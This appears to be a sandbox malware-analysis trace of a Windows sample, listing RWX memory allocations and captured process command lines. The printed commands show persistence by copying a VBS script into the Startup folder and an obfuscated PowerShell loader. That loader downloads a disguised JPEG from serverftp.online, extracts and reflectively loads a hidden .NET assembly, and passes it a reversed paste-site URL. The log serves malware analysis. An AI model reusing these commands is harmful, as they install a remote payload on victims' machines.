stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02793000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02794000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02795000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02796000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02797000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02798000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02799000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2848
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\IE_NET.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ UHB.vbs')"
cmdline powershell -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂HM⁂ZQBy⁂HY⁂ZQBy⁂GY⁂d⁂Bw⁂C4⁂bwBu⁂Gw⁂aQBu⁂GU⁂LwBp⁂G0⁂ZwBz⁂C8⁂YgBh⁂HQ⁂XwBu⁂GE⁂d⁂Bp⁂HY⁂ZQ⁂u⁂Go⁂c⁂Bl⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂D⁂⁂LwBR⁂HM⁂Rg⁂1⁂Hg⁂LwBk⁂C8⁂ZQBl⁂C4⁂ZQB0⁂HM⁂YQBw⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\IE_NET.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ UHB.vbs')"
cmdline cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\IE_NET.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ UHB.vbs')"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'http://serverftp.online/imgs/bat_native.jpeg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('0/QsF5x/d/ee.etsap//:sptth');$method.Invoke($null, $arguments)"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂HM⁂ZQBy⁂HY⁂ZQBy⁂GY⁂d⁂Bw⁂C4⁂bwBu⁂Gw⁂aQBu⁂GU⁂LwBp⁂G0⁂ZwBz⁂C8⁂YgBh⁂HQ⁂XwBu⁂GE⁂d⁂Bp⁂HY⁂ZQ⁂u⁂Go⁂c⁂Bl⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂D⁂⁂LwBR⁂HM⁂Rg⁂1⁂Hg⁂LwBk⁂C8⁂ZQBl⁂C4⁂ZQB0⁂HM⁂YQBw⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
cmdline powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\IE_NET.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ UHB.vbs')
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\IE_NET.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ UHB.vbs')"
filepath: cmd.exe
1 1 0

CreateProcessInternalW

thread_identifier: 2940
thread_handle: 0x00000298
process_identifier: 2936
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂HM⁂ZQBy⁂HY⁂ZQBy⁂GY⁂d⁂Bw⁂C4⁂bwBu⁂Gw⁂aQBu⁂GU⁂LwBp⁂G0⁂ZwBz⁂C8⁂YgBh⁂HQ⁂XwBu⁂GE⁂d⁂Bp⁂HY⁂ZQ⁂u⁂Go⁂c⁂Bl⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB